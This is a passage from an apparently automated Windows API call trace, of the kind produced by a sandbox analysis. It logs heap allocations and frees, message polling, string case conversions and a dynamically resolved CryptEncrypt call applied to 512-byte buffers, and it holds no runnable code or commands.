out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0258.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aaa00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0258.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.112] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0258.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6c10 [0258.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0258.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0258.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0258.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0258.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0258.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0258.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0258.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0258.113] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x1f8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x200) returned 1 [0258.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0258.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0258.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0258.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.118] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.118] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.118] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.119] CharLowerBuffW (in: lpsz="byte[512]", cchLength=0x9 | out: lpsz="byte[512]") returned 0x9 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.119] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.120] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.120] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.120] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.120] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.121] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.121] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.121] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.121] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24f42f0*, pdwDataLen=0x8bef68*=0x1f8, dwBufLen=0x200 | out: pbData=0x24f42f0*, pdwDataLen=0x8bef68*=0x200) returned 1 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0258.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0258.122] RtlAllocateHeap 